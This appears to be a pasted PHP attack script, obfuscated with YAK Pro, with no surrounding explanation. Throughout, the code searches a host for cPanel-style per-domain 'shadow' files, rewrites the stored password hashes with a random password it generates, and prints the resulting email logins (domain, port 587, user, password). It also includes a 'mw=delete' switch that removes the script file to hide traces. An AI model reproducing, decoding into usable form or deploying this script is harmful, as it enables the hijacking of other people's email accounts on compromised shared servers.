

May 16th, 2020
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  1. <?php
  2. /* __________________________________________________
  3. | Obfuscated by YAK Pro - Php Obfuscator 2.0.7 |
  4. | on 2020-05-17 04:40:23 |
  5. | GitHub: https://github.com/pk-fr/yakpro-po |
  6. |__________________________________________________|
  7. */
  8. goto Bce00; dc7a9: daea6: goto d7143; Ea6d4: $pat = array('', "\x2e\56\57", "\x2e\56\x2f\56\56\57", "\56\x2e\57\x2e\x2e\57\x2e\56\57", "\56\x2e\57\56\56\x2f\56\x2e\x2f\x2e\x2e\57", "\56\x2e\57\56\56\x2f\56\x2e\x2f\56\56\x2f\56\56\57", "\56\x2e\x2f\x2e\x2e\x2f\x2e\56\57\56\56\x2f\56\56\57\x2e\56\x2f"); goto D6081; D6081: $rand = rand(1000000, 9000000); goto Ade15; F2db1: $pass = crypt($password, "\x24\66\x24\122\x41\x4e\104\x4f\115\x24"); goto B9936; Ade15: $password = "\122\101\x4e\104\x4f\115" . $rand . ''; goto F2db1; B9936: foreach ($pat as $pa) { if (file_exists("{$pa}\x2f\145\164\143")) { goto D025a; Acc6b: $ex = explode("\15\12", $passwd); goto C2aad; C2aad: foreach ($a as $b) { goto a909e; cc6dc: e6acd: goto B8d59; e39a5: if (file_exists($file)) { goto e0e4f; B60c4: $save1 = @fopen($file, "\x77"); goto c1e3f; Fce77: c9c9e: goto dc893; Fea68: $aa = @explode("\x3a\72\x3a\x3a\72\x3a", $html1); goto e0993; c7868: $html1 = @str_replace(array("\xa", "\15", "\15\12", "\40"), '', $html); goto Fea68; dc893: $html2 = @file_get_contents("\64\x35\66\x37\70\71\x31\62\x33"); goto B60c4; e0993: foreach ($aa as $aaa) { if (!empty($aaa)) { goto C8ef6; Cd7f3: echo "{$b}\174" . "\x35\x38\67" . "\x7c{$abc}\100{$b}\174" . $password . "\x3c\142\162\x3e"; goto b8f55; b8f55: $save = @fopen("\64\x35\66\x37\x38\x39\61\62\x33", "\x61\142"); goto F83c9; Bd3bf: $abc = $ab[0]; goto Cd7f3; F83c9: @fwrite($save, "{$abc}\x3a{$pass}\72\61\66\62\64\71\72\72\x3a\x3a\72\15\12"); goto C8d87; C8ef6: $ab = @explode("\x3a\44", $aaa); goto Bd3bf; C8d87: } b08d0: } goto Fce77; Af7d7: @unlink("\x34\x35\66\x37\70\71\61\x32\x33"); goto e157d; b846e: @unlink("\x34\65\x36\x37\x38\x39\x31\62\63"); goto Ddef0; e157d: @unlink("\64\x35\x36\67\70\71\x31\62\63"); goto b846e; c1e3f: @fwrite($save1, $html2); goto Af7d7; e0e4f: $html = @file_get_contents($file); goto c7868; Ddef0: } goto cc6dc; a909e: if (@(!preg_match("\x2f\56\x70\x68\x70\x2f", $b)) && @(!preg_match("\57\56\x74\x78\164\57", $b)) && @(!preg_match("\x2f\56\x68\164\155\x6c\x2f", $b)) && @(!preg_match("\57\150\164\x61\x63\143\145\163\x73\57", $b)) && @(!preg_match("\x2f\x2e\x66\164\160\x2f", $b))) { $file = "{$path}\57{$b}\x2f\x73\x68\141\x64\157\167"; } goto e39a5; B8d59: } goto c56d3; c56d3: C49c5: goto d7847; B265b: $a = scandir($path); goto Acc6b; D025a: $path = "{$pa}\x2f\x65\x74\x63\57"; goto B265b; d7847: } fa129: } goto dc7a9; Bce00: echo "\74\150\x31\x3e\124\60\124\x53\x43\x34\74\57\150\61\x3e\x3c\x62\162\x3e"; goto Ea6d4; d7143: if ($_GET["\x6d\x77"] == "\144\145\154\145\164\145") { goto f35e9; cad72: @unlink("\x31\x30\x2e\160\150\160"); goto c9bba; c9bba: @unlink("\61\60\x2e\x70\150\x70"); goto A9802; f35e9: @unlink("\x31\x30\x2e\160\x68\x70"); goto cad72; A9802: }
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